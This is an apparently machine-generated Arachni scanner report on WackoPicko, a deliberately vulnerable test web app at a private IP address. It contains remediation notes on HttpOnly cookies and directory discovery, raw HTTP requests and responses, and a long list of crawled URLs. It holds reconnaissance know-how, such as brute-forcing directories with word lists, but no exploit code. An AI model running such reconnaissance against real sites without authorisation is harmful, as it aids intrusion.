This can help prevent XSS attacks targeting the cookies holding the client’s
session token (setting the HttpOnly flag does not prevent, nor safeguard against
XSS vulnerabilities themselves).
The initial step to remedy this would be to determine whether any client-side
scripts (such as JavaScript) need to access the cookie and if not, set the
HttpOnly flag.
Additionally, it should be noted that some older browsers are not compatible with
the HttpOnly flag, and therefore setting this flag will not protect those clients
against this form of attack.
These issues are considered untrusted (and may in fact be false
positives) because at the time they were identified the server was
exhibiting some kind of anomalous behavior or there was third party
interference (like network latency for example).
The listed issues need verification by a human.
Web applications are often made up of multiple files and directories.
It is possible that over time some directories may become unreferenced (unused) by the web application and forgotten about by the administrator/developer. Because web applications are built using common frameworks, they contain common directories that can be discovered (independent of server).
During the initial recon stages of an attack, cyber-criminals will attempt to locate unreferenced directories in the hope that the directory will assist in further compromise of the web application. To achieve this they will make thousands of requests using word lists containing common names. The response headers from the server will then indicate if the directory exists.
Arachni also contains a list of common directory names which it will attempt to access.
If directories are unreferenced then they should be removed from the web root and/or the application directory.
Preventing access without authentication may also be an option and can stop a client from being able to view the contents of a file, however it is still likely that the directory structure will be able to be discovered.
Using obscure directory names is implementing security through obscurity and is not a recommended option.
server
using
GET
at
http://192.168.0.26/WackoPicko/users/login/
pointing to
http://192.168.0.26/WackoPicko/users/login/
.
System components have attached some insights to this issue.
| Proof |
|---|
HTTP/1.1 200 OK |
| Type | In | Action |
|---|---|---|
server |
http://192.168.0.26/WackoPicko/users/login/ | http://192.168.0.26/WackoPicko/users/login/ |
Raw HTTP request used to retrieve the page.
GET /WackoPicko/users/login/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:50:38 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 958
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-23 first last">
<h2>Login</h2>
<table style="width:320px" cellspacing="0">
<form action="/WackoPicko/users/login.php/" method="POST">
<tr><td>Username :</td><td> <input type="text" name="username" /></td></tr>
<tr><td>Password :</td><td> <input type="password" name="password" /></td></tr>
<tr><td><input type="submit" value="login" /></td><td> <a href="/WackoPicko/users/register.php">Register</a></td></tr>
</form>
</table>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
http://192.168.0.26/WackoPicko/users/sample.php?userid=1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP request used to retrieve the page.
GET /WackoPicko/users/sample.php?userid=1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:51 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 961
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>These are Sample User's Pictures: </h2>
<div class="column prepend-1 span-21 first last" style="margin-bottom: 2em;">
<ul class="thumbnail-pic-list">
<li>
<a href="/WackoPicko/pictures/view.php?picid=7"><img src="/WackoPicko/upload/doggie/Dog.jpg.128_128.jpg" height="128" width="128" /></a>
</li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
server
using
GET
at
http://192.168.0.26/WackoPicko/error.php?msg=Error,%20need%20to%20provide%20a%20query%20to%20search
pointing to
http://192.168.0.26/WackoPicko/error.php?msg=Error,%20need%20to%20provide%20a%20query%20to%20search
.
System components have attached some insights to this issue.
| Proof |
|---|
HTTP/1.1 303 See Other |
http://192.168.0.26/WackoPicko/error.php?msg=Error,%20need%20to%20provide%20a%20query%20to%20search
Raw HTTP request used to retrieve the page.
GET /WackoPicko/error.php?msg=Error,+need+to+provide+a+query+to+search HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 303 See Other
Date: Mon, 06 Aug 2018 22:50:10 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /WackoPicko/error.php?msg=Error, need to provide a query to search
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Content-Type: text/html
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:50:10 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 881
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-22 first last">
<h2>There was an error!</h2>
<p class="error" style="text-align:center;">Error, need to provide a query to search</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.
| # | Time | Event | Element | Options |
|---|---|---|---|---|
| 0 | request |
http://192.168.0.26/WackoPicko/pictures/search.php?query=&x=38&y=12 |
|
Raw HTTP request used to retrieve the page.
GET /WackoPicko/pictures/search.php?query=&x=38&y=12 HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://192.168.0.26/WackoPicko/ Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5 Accept-Language: en-CA,*
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
server
using
GET
at
http://192.168.0.26/WackoPicko/users/login.php
pointing to
http://192.168.0.26/WackoPicko/users/login.php
.
System components have attached some insights to this issue.
| Proof |
|---|
HTTP/1.1 303 See Other |
| Type | In | Action |
|---|---|---|
server |
http://192.168.0.26/WackoPicko/users/login.php | http://192.168.0.26/WackoPicko/users/login.php |
Raw HTTP request used to retrieve the page.
GET /WackoPicko/users/login.php HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 303 See Other
Date: Mon, 06 Aug 2018 22:50:10 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /WackoPicko/users/login.php
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Content-Type: text/html
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:50:10 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 958
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-23 first last">
<h2>Login</h2>
<table style="width:320px" cellspacing="0">
<form action="/WackoPicko/users/login.php" method="POST">
<tr><td>Username :</td><td> <input type="text" name="username" /></td></tr>
<tr><td>Password :</td><td> <input type="password" name="password" /></td></tr>
<tr><td><input type="submit" value="login" /></td><td> <a href="/WackoPicko/users/register.php">Register</a></td></tr>
</form>
</table>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.
| # | Time | Event | Element | Options |
|---|---|---|---|---|
| 0 | request |
http://192.168.0.26/WackoPicko/pictures/search.php?query=&x=38&y=12 |
|
Raw HTTP request used to retrieve the page.
GET /WackoPicko/pictures/search.php?query=&x=38&y=12 HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://192.168.0.26/WackoPicko/ Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5 Accept-Language: en-CA,*
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
Generates a simple list of safe/unsafe URLs.
Analyzes the scan results and logs issues which persist across different pages.
This is usually a sign for a lack of a central/single point of input sanitization, a bad coding practise.
form input
name using
POST at the following pages:
form input
name using
POST at the following pages:
cookie input
PHPSESSID using
GET at the following pages:
| HTTP status code | URL |
|---|---|
| 200 | http://192.168.0.26/WackoPicko/ |
| 200 | http://192.168.0.26/WackoPicko/admin/index.php?page=login |
| 200 | http://192.168.0.26/WackoPicko/calendar.php |
| 303 | http://192.168.0.26/WackoPicko/cart/review.php |
| 200 | http://192.168.0.26/WackoPicko/css/ |
| 200 | http://192.168.0.26/WackoPicko/css/?C=D;O=A |
| 200 | http://192.168.0.26/WackoPicko/css/?C=M;O=A |
| 200 | http://192.168.0.26/WackoPicko/css/?C=N;O=D |
| 200 | http://192.168.0.26/WackoPicko/css/?C=S;O=A |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/ |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/?C=D;O=A |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/?C=M;O=A |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/?C=N;O=D |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/?C=S;O=A |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/ie.css |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/plugins/ |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/plugins/?C=D;O=A |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/plugins/?C=M;O=A |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/plugins/?C=N;O=D |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/plugins/?C=S;O=A |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/plugins/fancy-type/ |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/plugins/fancy-type/?C=D;O=A |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/plugins/fancy-type/?C=M;O=A |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/plugins/fancy-type/?C=N;O=D |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/plugins/fancy-type/?C=S;O=A |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/plugins/fancy-type/readme.txt |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/plugins/fancy-type/screen.css |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/print.css |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/screen.css |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/src/ |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/src/?C=D;O=A |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/src/?C=M;O=A |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/src/?C=N;O=D |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/src/?C=S;O=A |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/src/forms.css |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/src/grid.css |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/src/grid.png |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/src/ie.css |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/src/print.css |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/src/reset.css |
| 200 | http://192.168.0.26/WackoPicko/css/blueprint/src/typography.css |
| 200 | http://192.168.0.26/WackoPicko/css/stylings.css |
| 200 | http://192.168.0.26/WackoPicko/css/stylings.php |
| 200 | http://192.168.0.26/WackoPicko/error.php?msg=Error,%20need%20to%20provide%20a%20query%20to%20search |
| 200 | http://192.168.0.26/WackoPicko/guestbook.php |
| 200 | http://192.168.0.26/WackoPicko/guestbook/ |
| 200 | http://192.168.0.26/WackoPicko/passcheck.php |
| 303 | http://192.168.0.26/WackoPicko/piccheck.php |
| 303 | http://192.168.0.26/WackoPicko/pictures/purchased.php |
| 200 | http://192.168.0.26/WackoPicko/pictures/recent.php |
| 303 | http://192.168.0.26/WackoPicko/pictures/search.php |
| 200 | http://192.168.0.26/WackoPicko/pictures/search.php?query=&x=38&y=12 |
| 303 | http://192.168.0.26/WackoPicko/pictures/upload.php |
| 303 | http://192.168.0.26/WackoPicko/pictures/view.php?picid=10 |
| 303 | http://192.168.0.26/WackoPicko/pictures/view.php?picid=11 |
| 303 | http://192.168.0.26/WackoPicko/pictures/view.php?picid=12 |
| 303 | http://192.168.0.26/WackoPicko/pictures/view.php?picid=13 |
| 303 | http://192.168.0.26/WackoPicko/pictures/view.php?picid=14 |
| 303 | http://192.168.0.26/WackoPicko/pictures/view.php?picid=15 |
| 303 | http://192.168.0.26/WackoPicko/pictures/view.php?picid=7 |
| 303 | http://192.168.0.26/WackoPicko/pictures/view.php?picid=8 |
| 303 | http://192.168.0.26/WackoPicko/pictures/view.php?picid=9 |
| 200 | http://192.168.0.26/WackoPicko/test/ |
| 200 | http://192.168.0.26/WackoPicko/tos.php |
| 200 | http://192.168.0.26/WackoPicko/upload/ |
| 200 | http://192.168.0.26/WackoPicko/upload/3/ |
| 200 | http://192.168.0.26/WackoPicko/upload/3/?C=D;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/3/?C=M;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/3/?C=N;O=D |
| 200 | http://192.168.0.26/WackoPicko/upload/3/?C=S;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/?C=D;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/?C=M;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/?C=N;O=D |
| 200 | http://192.168.0.26/WackoPicko/upload/?C=S;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/againIxwsed |
| 200 | http://192.168.0.26/WackoPicko/upload/againiJ42nH |
| 200 | http://192.168.0.26/WackoPicko/upload/doggie/ |
| 200 | http://192.168.0.26/WackoPicko/upload/doggie/?C=D;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/doggie/?C=M;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/doggie/?C=N;O=D |
| 200 | http://192.168.0.26/WackoPicko/upload/doggie/?C=S;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/doggie/Dog.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/doggie/Dog.jpg.128.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/doggie/Dog.jpg.128_128.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/doggie/Dog.jpg.550.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/flowers/ |
| 200 | http://192.168.0.26/WackoPicko/upload/flowers/?C=D;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/flowers/?C=M;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/flowers/?C=N;O=D |
| 200 | http://192.168.0.26/WackoPicko/upload/flowers/?C=S;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/flowers/flowers |
| 200 | http://192.168.0.26/WackoPicko/upload/flowers/flowers.128.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/flowers/flowers.128_128.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/flowers/flowers.550.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/flowers/flweofoee |
| 200 | http://192.168.0.26/WackoPicko/upload/flowers/flweofoee.128.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/flowers/flweofoee.128_128.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/flowers/flweofoee.550.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/foos/ |
| 200 | http://192.168.0.26/WackoPicko/upload/foos/?C=D;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/foos/?C=M;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/foos/?C=N;O=D |
| 200 | http://192.168.0.26/WackoPicko/upload/foos/?C=S;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/foos/Foos_ball.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/house/ |
| 200 | http://192.168.0.26/WackoPicko/upload/house/?C=D;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/house/?C=M;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/house/?C=N;O=D |
| 200 | http://192.168.0.26/WackoPicko/upload/house/?C=S;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/house/My_House |
| 200 | http://192.168.0.26/WackoPicko/upload/house/My_House.128.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/house/My_House.128_128.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/house/My_House.550.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/house/hodjjgld |
| 200 | http://192.168.0.26/WackoPicko/upload/house/hodjjgld.128.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/house/hodjjgld.128_128.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/house/hodjjgld.550.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/house/our_house |
| 200 | http://192.168.0.26/WackoPicko/upload/house/our_house.128.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/house/our_house.128_128.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/house/our_house.550.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/quarters/ |
| 200 | http://192.168.0.26/WackoPicko/upload/quarters/?C=D;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/quarters/?C=M;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/quarters/?C=N;O=D |
| 200 | http://192.168.0.26/WackoPicko/upload/quarters/?C=S;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/quarters/fun |
| 200 | http://192.168.0.26/WackoPicko/upload/quarters/fun.128.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/quarters/fun.128_128.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/quarters/fun.550.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/quarters/more_quarters |
| 200 | http://192.168.0.26/WackoPicko/upload/quarters/more_quarters.128.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/quarters/more_quarters.128_128.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/quarters/more_quarters.550.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/testing/ |
| 200 | http://192.168.0.26/WackoPicko/upload/testing/?C=D;O=A |
